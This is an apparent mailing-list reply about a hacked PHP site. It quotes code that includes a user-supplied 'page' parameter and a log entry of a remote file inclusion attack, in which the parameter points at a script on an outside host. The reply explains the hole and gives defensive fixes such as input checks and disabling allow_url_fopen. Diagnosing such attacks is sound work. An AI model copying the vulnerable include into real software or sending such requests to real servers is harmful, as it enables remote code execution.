Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?Looks like that's the one. Have a look at the following line in your log file: 82.103.132.227 - - [29/Oct/2006:20:12:34 +0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt? HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" Your script then includes and executes the script from the URL. How to avoid? First, follow RULE ONE (TM): Always do sanity checks on user-supplied input. The impact could have been avoided by setting allow_url_fopen to 0 in your php.ini. (Unless one of your scripts really, really needs this - but think twice before using it!) But IMHO your approach to include files with dynamically generated paths is not a good idea anyway. Consider a different solution like redirecting the Browser to the resulting URL. This won't prevent the attack from being successful, but it won't affect your server. Best regards, Holger
pgpgvdSS4BmFk.pgp
Description: PGP signature
